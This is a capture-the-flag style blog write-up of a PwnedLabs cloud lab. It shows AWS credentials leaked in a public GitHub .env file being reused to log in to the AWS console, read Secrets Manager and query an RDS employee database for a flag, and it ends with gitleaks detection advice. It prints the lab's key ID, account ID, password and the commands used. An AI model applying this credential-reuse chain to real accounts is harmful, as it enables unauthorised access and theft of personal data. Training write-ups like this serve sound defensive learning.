PwnedLabs - Leverage Leaked Credentials for Pwnage

Summary

In this blog, we will take a look at the "Leverage Leaked Credentials for Pwnage" lab, in which sensitve credentials and keys are exposed in a company's public repository which leads access to company's AWS console and SecretsManager further revealing the credentials of database.

Topics Covered

Here are the topics covered in this blog -

  • Lay of the attack chain.

  • Detailed explanation of the attack steps.

  • Possible defensive measure.

Attack Scenario

Official scenario description.

In the ever-shifting world of logistics, Huge Logistics has emerged as an undisputed global leader. Yet, every Goliath has its vulnerabilities. Whispered rumors in cybersecurity circles suggest that amidst the vast digital sprawl of Huge Logistics, there might lie unnoticed weaknesses. As a seasoned security consultant, your mission is set: Navigate the labyrinth of Huge Logistics' GitHub repositories, looking for the smallest chink in their armor. Dive deep, analyze thoroughly, and leave no stone unturned. Can you spot what others have missed?

Before we move further into exploitation, I would like to visualize the whole attack chain.

The attacker here is an un-authenticated IAM user -

  1. Discovers an organization's open-source github repository.

  2. Extract sensitive credentials from the .env file.

  3. Uses the credentials to login to the organization AWS Managemet Console.

  4. Discovers secrets and database credentials in AWS Secrets Manager.

  5. Uses database credentials to login and extract the flag.

Setup

For this attack demonstration, we don't require an initial access key of authenticated IAM user. We can use our own AWS keys but it's optional here.

GitHub Repo Enumeration

We're already provided with the target organization's GitHub repository.

https://github.com/huge-logistics/aws-react-app

Visit the following repository.

This is a basic AWS React JS application. There is a .env file which is a hidden file used by a variety of applications and frameworks to define environment variables including credentials.

This file has a lot of credentials related to Laravel, Devops and MySql Databases. Taking a further look.

As we can see that there is AWS Access Key, AWS S3 Bucket name and the region mentioned. We can maybe form an idea to get the AWS account ID from the access key, and see if the database credentials referring to the user Jose are also valid AWS IAM credentials, as password reuse is a common bad practice.

Before that let's verify is the Access Key ID is genuine or not using aws sts get-caller-identity

root@kali ~/p/leak-credentials# aws sts get-access-key-info --access-key-id AKIAWHEOTHRFVXYV44WP --profile Faran
{
    "Account": "427648302155"
}

Now that we have the account ID we can try to login to the AWS Management Console with the URL

https://427648302155.signin.aws.amazon.com/console

For the credentials we can use the Jose username and it's password DevOps0001!

The credentials worked and we got a successful login. Checking out the resources in the recently visited tabs, I found some secrets in Secrets Manager.

Two secrets seems to be intersting.

  • Employee-database

  • Employee-database-admin

Clicking on the service we see two secrets relating to an employee-database. We're denied access to the admin secret, let's check the other one which is employee-database-admin.

Checking the “employee-database” secret, then go to “secret value” then click on “retrieve secret value”

From the above screenshot, we can see that it has MySql credentials. Let's login using the credentials.

root@kali ~/p/leak-credentials# mysql -h employees.cwqkzlyzmm5z.us-east-1.rds.amazonaws.com -P 3306 -D employees -u reports_clone -p
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 531401
Server version: 10.6.10-MariaDB managed by https://aws.amazon.com/rds/

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [employees]> show databases;
+--------------------+
| Database           |
+--------------------+
| employees          |
| information_schema |
+--------------------+
2 rows in set (0.203 sec)

MariaDB [employees]>

After logging into MySQL, there is a database called 'employees'.

MariaDB [employees]> use employees;
Database changed
MariaDB [employees]> show tables;
+---------------------+
| Tables_in_employees |
+---------------------+
| countries           |
| departments         |
| dependents          |
| employees           |
| flag                |
| jobs                |
| locations           |
| regions             |
+---------------------+
8 rows in set (0.203 sec)

Changing the database to 'employees' and listing the tables. There are lot of interesting tables.

Checking out the employees table with the query - select * from employees

We retrieve employee data including their full name, email address, phone numbers and salary.

Listing more tables and their contents.

At this point the attacker has gained full access to the target organization's database and can query sensitive data. To finish this lab retrive the flag from the flag database.

MariaDB [employees]> select * from flag;
+----------------------------------+
| flag                             |
+----------------------------------+
| d0e4b22365ad230c53c4ffc269dc0202 |
+----------------------------------+
1 row in set (0.202 sec)

Possible Mitigation

The only possible solution is to not to push the .env file into the production which can leak sensitive credentials open to the attack. It is also recommended to implement secure CICD pipelining.

To constantly check for possible leaks in your repository we can use a tool called gitleaks tool to detect.

root@kali ~/p/leak-credentials [1]# git clone https://github.com/huge-logistics/aws-react-app
Cloning into 'aws-react-app'...
remote: Enumerating objects: 98, done.
remote: Counting objects: 100% (98/98), done.
remote: Compressing objects: 100% (75/75), done.
remote: Total 98 (delta 5), reused 95 (delta 5), pack-reused 0
Receiving objects: 100% (98/98), 83.34 KiB | 3.62 MiB/s, done.
Resolving deltas: 100% (5/5), done.
root@kali ~/p/leak-credentials# cd aws-react-app/
root@kali ~/p/l/aws-react-app (main)# gitleaks detect -v

    
    │╲
     
     
        gitleaks

Finding:     ...P_AWS_ACCESS_KEY_ID=AKIAWHEOTHRFVXYV44WP
Secret:      AKIAWHEOTHRFVXYV44WP
RuleID:      aws-access-token
Entropy:     3.821928
File:        .env
Line:        40
Commit:      48d24561bf29fe5a3990f9183d698b6e6fea8d4a
Author:      Jose Martinez
Email:       jose@pwnedlabs.io
Date:        2023-07-12T11:58:21Z
Fingerprint: 48d24561bf29fe5a3990f9183d698b6e6fea8d4a:.env:aws-access-token:40

5:05AM INF 2 commits scanned.
5:05AM INF scan completed in 192ms
5:05AM WRN leaks found: 1

Thank you for reading 🔥

PreviousPwnedLabs - Exploiting Weak Bucket PoliciesNextPwnedLabs - Leverage Insecure Storage and Backups for Profit

Last updated